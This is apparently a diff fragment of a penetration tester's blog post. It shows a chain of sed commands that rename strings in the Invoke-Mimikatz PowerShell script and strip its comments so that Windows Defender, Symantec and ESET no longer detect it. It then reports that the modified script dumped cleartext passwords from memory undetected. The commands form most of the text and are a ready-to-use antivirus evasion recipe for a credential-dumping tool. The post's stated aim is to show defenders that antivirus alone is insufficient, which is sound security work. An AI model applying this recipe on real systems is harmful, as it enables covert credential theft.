Carrie Roberts // *

 sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1 sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1 sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1 sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1 sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1 sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' Invoke-Mimikatz.ps1 sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions #\-/g" Invoke-Mimikatz.ps1

-We took this modified Mimikatz file and ran it against systems running up-to-date versions of Windows Defender, Symantec and ESET.
-(Thanks Brian Fehrman and David Fletcher).
+We took this modified Mimikatz file and ran it against systems running up-to-date versions of Windows Defender, Symantec, and ESET.
+(Thanks to Brian Fehrman and David Fletcher).
 We were able to run the script to dump cleartext passwords from memory and it was not detected by AV.

 We successfully modified the Mimikatz script to avoid AV detection without changing the functionality.
 Great evidence to why you should not rely solely on your AV for protection.